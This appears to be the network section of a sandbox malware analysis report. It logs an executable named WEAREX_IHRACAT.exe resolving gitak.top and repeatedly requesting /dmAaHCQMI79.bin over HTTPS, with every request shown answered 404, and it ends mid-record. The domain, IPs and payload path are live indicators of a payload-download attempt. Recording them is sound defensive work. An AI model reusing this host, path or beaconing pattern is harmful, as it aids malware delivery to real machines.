                        Aug 29, 2024 12:44:41.104805946 CEST44349801172.67.207.219192.168.11.20
                        Aug 29, 2024 12:44:41.321748972 CEST44349801172.67.207.219192.168.11.20
                        Aug 29, 2024 12:44:41.321887016 CEST49801443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:44:41.322227001 CEST49801443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.715075016 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.715364933 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.715671062 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.715722084 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.715744972 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.715769053 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980079889 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980321884 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.980417967 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980582952 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.980622053 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980659962 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980859041 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.980906010 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.980954885 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:29.981025934 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.981112957 CEST49817443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:29.981180906 CEST44349817172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.064666033 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.064769983 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.064963102 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.065227032 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.065289974 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.286212921 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.286431074 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.286741018 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.286794901 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.286827087 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.286850929 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.545794964 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546044111 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546104908 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546139956 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546278954 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546336889 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546387911 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546535969 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546622992 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546741962 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546775103 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.546803951 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.546900034 CEST44349818172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:40.547034979 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:40.547074080 CEST49818443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.624530077 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.624655008 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.624865055 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.625030041 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.625073910 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.857280970 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.857425928 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.857775927 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.857803106 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:50.857872009 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:50.857888937 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.113825083 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.113893032 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.113938093 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.114001989 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:47:51.114052057 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114275932 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114275932 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114660025 CEST49819443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:47:51.114674091 CEST44349819172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.153462887 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.153482914 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.153681040 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.153919935 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.153930902 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.368108988 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.368365049 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.368993044 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.369003057 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.369113922 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.369123936 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.626879930 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627010107 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627059937 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627068996 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627083063 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627182961 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627263069 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627271891 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627296925 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:01.627378941 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627484083 CEST49820443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:01.627496958 CEST44349820172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.666954994 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.666976929 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.667110920 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.667321920 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.667332888 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.882405996 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.882591963 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.882884026 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.882891893 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:11.882967949 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:11.882975101 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140532970 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140585899 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140661955 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140696049 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.140733957 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140743971 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.140772104 CEST44349821172.67.207.219192.168.11.20
                        Aug 29, 2024 12:48:12.140891075 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.141032934 CEST49821443192.168.11.20172.67.207.219
                        Aug 29, 2024 12:48:12.141045094 CEST44349821172.67.207.219192.168.11.20
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Aug 29, 2024 12:40:17.157623053 CEST | 57791 | 53 | 192.168.11.20 | 1.1.1.1
                        Aug 29, 2024 12:40:17.539810896 CEST | 53 | 57791 | 1.1.1.1 | 192.168.11.20

                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Aug 29, 2024 12:40:17.157623053 CEST | 192.168.11.20 | 1.1.1.1 | 0x9d5f | Standard query (0) | gitak.top | A (IP address) | IN (0x0001) | false

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Aug 29, 2024 12:40:17.539810896 CEST | 1.1.1.1 | 192.168.11.20 | 0x9d5f | No error (0) | gitak.top | | 172.67.207.219 | A (IP address) | IN (0x0001) | false
                        Aug 29, 2024 12:40:17.539810896 CEST | 1.1.1.1 | 192.168.11.20 | 0x9d5f | No error (0) | gitak.top | | 104.21.22.240 | A (IP address) | IN (0x0001) | false

                        • gitak.top
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.11.20 | 49776 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe

                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:40:17 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:18 UTC | 667 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:18 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: MISS
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RtkS5n2C9K8mjiAQPIkIP9T88mXoVLDUFQwJUfSU5sWwsYGnJKDIxQnhTK%2BYG5ngpEcRf5RfEbq4xB%2BvWG1QUI17VL2JbGYWyhEsdLzTqLMGDmjiPOeBBprfnY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babec105a2956ec-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.11.20 | 49777 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe

                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:40:28 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:28 UTC | 675 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:28 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 10
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLabE8DPPtKS9rn%2FTmLbROV6pDDQFvRUk5aR5YeVnvTApARwxz%2F8eMLXqLjU1H2LPDuTGQXlPnvkwrSU8v3J6RPJcu5I7EI7q06db33Ur7Nef7zicxytRomCyHM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babec535dbf2d28-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.11.20 | 49778 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe

                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:40:39 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:39 UTC | 681 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:39 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 21
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWXXS2NrwTGdUxdtZPpsZTpq8PP%2Bh4tk92eB%2FEd5X13HxWMvQ%2B6NdI2shR5ctT2z8oU1E4HTXmPeGexsCOi5j4W%2FHdkE0kdFxfXspk4Tk%2Bm1yHedovEr5Pti9IA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babec950eb559f1-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.11.20 | 49779 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe

                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:40:49 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:40:49 UTC | 675 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:40:49 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 31
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0fWlft6fUQ4S4m4KlgLPN5GN2AGQUD7AL7zviH7Ky3zISp6ZpHnfTQrQtdHPn3GPqoPei3sBc5gN1WUIihvF5Y%2BpAf7A4Bpcdnl1W%2BRSByVg3wQsjOuM3azODM%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babecd6edd32d15-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.11.20 | 49780 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:41:00 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:00 UTC | 673 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:00 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 42
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGiHI3lLvT9Gur%2FzlVH2DRekG2i01nj0wF8JaD0PDHAb3Vx3HLZBTbOoe87ew2QVaaNRadhADqYBGLdObIr7C8zJRuT68CpYshrP3ekInFYY3JTra00i0dP02DA%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babed18a9bb082e-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.11.20 | 49781 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:41:10 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:10 UTC | 673 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:10 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 52
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7gL3sdbOuJzSEcJkT99MXrxL780mMWdYRsl3RrCszGJhf9VuZqfcXQG0z6504sWRm1nsGiSL4fIXJA2sCPjAZe5kDXg2AB3Xa9%2BYi2a0kOCrOsKiLgG0cxQFTo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babed5a69411fd4-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.11.20 | 49782 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:41:21 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:21 UTC | 685 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:21 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 63
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5b2RW%2Fj%2BT4RrEZWx4D%2FnyakwG90IGNXz%2Fl%2Fy9eJcEXVaz99bZLUGlNYOClAFPHSWDkTInHh3OqeupG1uIY%2FCy1DDISV8N41MvZpYqErhYiSpEZDk9JPknQQYf8%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babed9c1cd9c584-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.11.20 | 49783 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:41:31 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:31 UTC | 691 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:31 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 73
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xhKipF4ZA8%2Bkvdd%2BU1F%2BrBg4eynZTN%2BjBDWj9bgfGgH%2BilT3MDXaYBqPidLk%2BHIjGpOJ1KV5XU%2BxKhXjAr%2FlM%2FPDMyPa%2BmW65B7puXv5TX78IU5IOvcZbn8wsk%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babedddcc3059df-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.11.20 | 49784 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:41:42 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:42 UTC | 677 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 84
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EoNQvU%2F68bPKsSQUFFONu8irGKTbWrh9ZiAyCeTfaGqzkT7pMFpOm5qS5cv%2BpGcO9DD5iqwclNCCrU5vtum1PhltMVpXIYst3f8%2BQdM1rJzMTQXGTSBbOxZT56Q%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babee1f886782ec-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.11.20 | 49785 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:41:52 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:52 UTC | 677 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:52 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 94
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwkKcTa3VXkc7R9rQYkkb4eqPmY8q4UzebAK8gzZsZ4XJBRVEUF19Zbfu0H4L7Gp15nI4QJZ7M5%2F%2Fm8bIekDe9NEAW9JWIima4oQgcnbn1Gr3bjWeb6%2F2hGaJTo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babee614a62c968-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.11.20 | 49786 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:42:03 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:03 UTC | 680 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:03 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 105
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13eTPd51Zx4b9EW4xNYd4Zei8NPIGF4uqYtQUC%2BvF7tiLZ45S6fm%2B4M7DPeBk7meYNsqfYwxRKlb%2BQqUwjx4TJBXNlEP7Z%2FylcPwqo20X09H0aQMyGuOzkdWb64%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babeea32f3d061c-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.11.20 | 49787 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:42:13 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:13 UTC | 680 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:13 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 115
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqmBalLXHAr8qRHykb93s7Lp50lREcKDyK8n%2Bv3wMBlsq8eWm%2FglNpbgr71VKPXaN9RNmJINX9aly%2FjGoZjXd5KoUWa3uB7RDsG05r8TwF7mWPTyTmQB3N%2Fsh6c%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babeee4daa80854-IAD
                        alt-svc: h3=":443"; ma=86400


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.11.20 | 49788 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:42:24 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:24 UTC | 678 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:24 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 126
